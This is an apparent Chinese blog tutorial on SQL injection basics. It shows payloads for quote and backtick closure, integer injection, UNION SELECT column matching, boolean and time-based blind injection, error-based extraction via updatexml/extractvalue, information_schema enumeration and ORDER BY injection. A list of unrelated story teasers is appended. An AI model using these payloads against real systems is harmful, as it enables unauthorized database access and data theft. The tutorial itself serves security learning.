SQL注入基础

什么是SQL注入

拼接sql得到想要的数据或反应, 而这些sql是不常见的编程逻辑的sql.

SQL语句闭合问题

字符串类型闭合
1. 单引号 - 值的类型是字符串类型
  一般是对where ,if 等表达式的条件值进行引用
  注入URL:
```
http://x.x.x.x/name=test' and '1'='1' %23
```
  后端SQL:
```
select c1,c2 from db.table where name='test' and '1'='1' #'
```
  解释一下: %23就是#quote后的值, 其中' and '1'='1' #为注入的SQL
  
  可以发现, name是字符串类型字段, 字符串类型必须使用单引号将变量值括起来才符合SQL语法
  其中 '1'='1' 就是注入点, 可以换成自己的语句
2. 反引号 - 字段名
  一般是对 group by, order by 等对字段进行操作的表达式中字段名的引用
  注入URL:
```
http://x.x.x.x/order=name`, if(1=1,1,2) %23
```
  后端SQL:
```
select c1,c2 from db.table order by `name`, if(1=1,1,aaa) #`
```
  解释一下:
  - URL中的name`, if(1=1,1,2) %23, name后的反引号提前把name闭合,紧接着注入了, if(1=1,1,2) %23, %23是#, 直接把后面的sql语句给注释了
  - if里面的aaa是一个不存在(乱写的)的字段名, 其中1=1就是注入点, 可以换成自己的语句, 观察页面变化来进行盲注
  - order by x,y 可以根据多个字段名排序, 当后端做了变量检查可以尝试使用逗号多个字段排序来注入
  - 注意: group by, order by 字段名的时候, 是可加可不加反引号的, 需要尝试才知道后端代码是否加了反引号
整数类型闭合

注入URL:
```
http://x.x.x.x/id=1 and 1=1 %23
```
后端SQL:
```
select c1,c2 from db.table where id=1 and 1=1 #
```
解释一下:
整数类型的变量过滤无需单引号, 同样1=1为注入点

SQL注入分类

UNION SELECT

union select 可以将后面的select出的数据与前面的select出的结果集进行合并

image.png

union select 所需前置条件
1. union select的字段数目必须与前面select语句的数目一致
  办法: 使用order by N 进行猜测(N是整数, 代表第几个字段)
  select depts.id, depts.name from depts order by 1
  这里的1是指字段的位置, 代表使用第一个字段进行排序, 如果使用超出字段数目的位置参数排序就会报错, 由此可以推算出select的字段个数, 如下图:
  
  image.png
2. union select的字段的类型必须与前面的匹配
  办法: 使用 null 代替, 因为所有类型字段都支持null, 如下图所示
  select depts.id, depts.name from depts where id = 1 union select null, null
  
  image.png
盲注

前面的union select 可以将数据暴露到页面上, 但是有些情况无法使用union select, 比如:
- union select 被WAF过滤
- http页面返回内容没有变化
盲注原理:
顾名思义, 盲注就是我们不能直接的看到数据的展示或变化
盲注SQL:
```
select depts.id, depts.name from depts where id = 1 and if(ascii(substring(database(), 1 ,1)) = 101,1,0)
```
SQL解释:
- database() 当前数据库的名字, 在这里是"ec_ops"
- substring('ec_ops',1,1) 取出'ec_ops'的第一个字符'e'; 第一个1是第一次, 第二个1是步进值为1
- ascii('e') 将'e'字符转成ascii码; 'e'的ascii为101
- if(ascii('e')=101,1,0) 当ascii('e')=101为true的时候, 返回1(既true), 否则返回0(既false);
- id = 1 and if() -- 当左右两个条件同时为true时, 才展示数据,这样可以根据页面数据变化来判断if里面猜测是否正确, if(xx=xx,1,0) 条件为真的值(例子中是1)也可以换成sleep(1), 成功则睡一秒, 根据访问延迟来判断是否成功
注: 英文可见字符的ascii码范围: 32-127, 逐步实验可以撞出库名的所有字符的ascii码, 也就得出完整的库名

报错
使用报错注入的前置条件
web后端service开启了报错开关允许打印到web前端显示
- and 1=(updatexml(1,concat(0x3a,(select user())),1)) 获取当前数据库用户
- and extractvalue(0x7e,concat(0x7e,user())) 获取当前数据库用户
- and exp(~（select * from(select user())a）) 获取当前数据库服务器类型
- and linestring(id) 快速获得当前库名、表名
- ....

练手

MySQL
information_schema 存放着数据库的所有信息, 包括有哪些库, 表, 字段
- select schema_name from information_schema.schemata -- 所有数据库名
- select table_name from information_schema.tables where table_schema = 'db_name' --获取db_name的所有表
- select column_name from information_schema.columns where table_schema = 'db_name' and table_name = 'table_name' --获取db_name.table_name的所有字段名

常见注入点

WHERE column_name [ = | like ] value
select c1,c2 from tables where id = 1 [ and | having ] condition
使用 and / having 或 "union select" 连接其他sql语句

image.png
ORDER BY column_name

例1: select id, name from ec_ops.depts order by if(1=1,id,name)
当1=1为真时, 以id进行排序, 否则以name排序, 1=1可以换成其他sql语句
注意: 如果将if里的id换为sleep(1), 每条数据都会睡一次, 如果有300条数据则睡300秒, 即使加limit 1也没用慎用

例2: select id, name from ec_ops.depts order by rand()
随机排序

例3:
```
select id from depts order by 
    case 
        when 1=1          # 当1=1为真以id排序
            then id 
        when 1=2          # 当1=2为真以name排序
            then name
        when 1=3          # 当1=3为真以title排序
            then title
        else author       # 以上条件都不符合则以author排序
    end
```
总结: order by就是利用不同字段排序, 来观察数据变化从而进行盲注

最后编辑于：2018.08.03 15:32:31

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 200,392评论 5赞 470
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 84,258评论 2赞 377
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 147,417评论 0赞 332
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 53,992评论 1赞 272
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 62,930评论 5赞 360
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 48,199评论 1赞 277
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 37,652评论 3赞 390
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 36,327评论 0赞 254
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 40,463评论 1赞 294
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 35,382评论 2赞 317
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 37,432评论 1赞 329
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 33,118评论 3赞 315
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 38,704评论 3赞 303
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 29,787评论 0赞 19
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 30,999评论 1赞 255
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 42,476评论 2赞 346
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 42,057评论 2赞 341

SQL注入基础

什么是SQL注入

SQL语句闭合问题

字符串类型闭合

整数类型闭合

SQL注入分类

UNION SELECT

盲注

报错

练手

常见注入点

推荐阅读更多精彩内容